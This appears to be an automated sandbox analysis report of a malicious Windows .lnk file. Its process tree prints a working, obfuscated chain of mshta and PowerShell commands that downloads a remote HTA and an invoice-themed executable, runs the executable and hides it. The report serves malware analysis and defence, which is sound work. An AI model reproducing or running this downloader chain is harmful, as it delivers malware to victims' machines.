Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
29-05-2023 08:22
General
-
Target
04451999.lnk
-
Size
2KB
-
MD5
594a86d0fa8711e48066b1852ad13ac6
-
SHA1
35b840640e6a3c53a6ba0c6efa1a19a061f5c104
-
SHA256
b49d777b48ec591859c9374a2a707b179cb3770b54d9dc03b5c7f3ae2f06b360
-
SHA512
bc67e03c2a577c936c376b27cb141cb2f1e041a32dc4ebfa14c575289b3a15e5b27faec9e25f12caf9f00ada13b934c9adf348a2fef4d7202119f13880bf23ab
Malware Config
Extracted
https://cdn.discordapp.com/attachments/952087079892975626/1108466607375786045/INVOICE_MT103.hta
Signatures
-
Blocklisted process makes network request 8 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\04451999.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://cdn.discordapp.com/attachments/952087079892975626/1108466607375786045/INVOICE_MT103.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/952087079892975626/1108466607375786045/INVOICE_MT103.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function irOWQZlui($rqOUiWzHkhWgD, $IKzJrq){[IO.File]::WriteAllBytes($rqOUiWzHkhWgD, $IKzJrq)};function xdWIlfTRkgY($rqOUiWzHkhWgD){if($rqOUiWzHkhWgD.EndsWith((zkgDPisVlAuJ @(50441,50495,50503,50503))) -eq $True){rundll32.exe $rqOUiWzHkhWgD }elseif($rqOUiWzHkhWgD.EndsWith((zkgDPisVlAuJ @(50441,50507,50510,50444))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $rqOUiWzHkhWgD}elseif($rqOUiWzHkhWgD.EndsWith((zkgDPisVlAuJ @(50441,50504,50510,50500))) -eq $True){misexec /qn /i $rqOUiWzHkhWgD}else{Start-Process $rqOUiWzHkhWgD}};function VzLgxMRdbYx($irOWQZlui){$rcMhAFWjwcVMl=(zkgDPisVlAuJ @(50467,50500,50495,50495,50496,50505));$bLZpBzueoWZVu=(Get-ChildItem $irOWQZlui -Force);$bLZpBzueoWZVu.Attributes=$bLZpBzueoWZVu.Attributes -bor ([IO.FileAttributes]$rcMhAFWjwcVMl).value__};function xzbtejDWHhuwEVh($coPEObLhmzAsc){$HnFqDTYJKloihJQRpjyu = New-Object (zkgDPisVlAuJ @(50473,50496,50511,50441,50482,50496,50493,50462,50503,50500,50496,50505,50511));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IKzJrq = $HnFqDTYJKloihJQRpjyu.DownloadData($coPEObLhmzAsc);return $IKzJrq};function zkgDPisVlAuJ($APgWvfimRpue){$qbPUbEtlxYS=50395;$DbWhSuQwPCybrH=$Null;foreach($jvXllrVrJ in $APgWvfimRpue){$DbWhSuQwPCybrH+=[char]($jvXllrVrJ-$qbPUbEtlxYS)};return $DbWhSuQwPCybrH};function sFtwplqMxbxc(){$vZyPrAsecrzXNsI = $env:AppData + '\';$iEmveRpUzkdVCOej = $vZyPrAsecrzXNsI + 'MT103-Payment.jpg';If(Test-Path -Path $iEmveRpUzkdVCOej){Invoke-Item $iEmveRpUzkdVCOej;}Else{ $vzQdvXrtZgFnqAd = xzbtejDWHhuwEVh (zkgDPisVlAuJ @(50499,50511,50511,50507,50510,50453,50442,50442,50500,50441,50500,50493,50493,50441,50494,50506,50442,50471,50509,50483,50483,50466,50443,50499,50442,50472,50479,50444,50443,50446,50440,50475,50492,50516,50504,50496,50505,50511,50441,50501,50507,50498));irOWQZlui $iEmveRpUzkdVCOej $vzQdvXrtZgFnqAd;Invoke-Item $iEmveRpUzkdVCOej;};$VUgYBSSrM = $vZyPrAsecrzXNsI + 'Invoice_MT103_Payment.exe'; if (Test-Path -Path $VUgYBSSrM){xdWIlfTRkgY $VUgYBSSrM;}Else{ $MiFlwEirnefQv = xzbtejDWHhuwEVh (zkgDPisVlAuJ @(50499,50511,50511,50507,50510,50453,50442,50442,50494,50495,50505,50441,50495,50500,50510,50494,50506,50509,50495,50492,50507,50507,50441,50494,50506,50504,50442,50492,50511,50511,50492,50494,50499,50504,50496,50505,50511,50510,50442,50452,50448,50445,50443,50451,50450,50443,50450,50452,50451,50452,50445,50452,50450,50448,50449,50445,50449,50442,50444,50444,50443,50451,50447,50447,50450,50448,50447,50447,50452,50448,50444,50452,50450,50444,50451,50451,50443,50442,50468,50505,50513,50506,50500,50494,50496,50490,50472,50479,50444,50443,50446,50490,50475,50492,50516,50504,50496,50505,50511,50441,50496,50515,50496));irOWQZlui $VUgYBSSrM $MiFlwEirnefQv;xdWIlfTRkgY $VUgYBSSrM;};VzLgxMRdbYx $VUgYBSSrM;;;;;}sFtwplqMxbxc;" uac4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB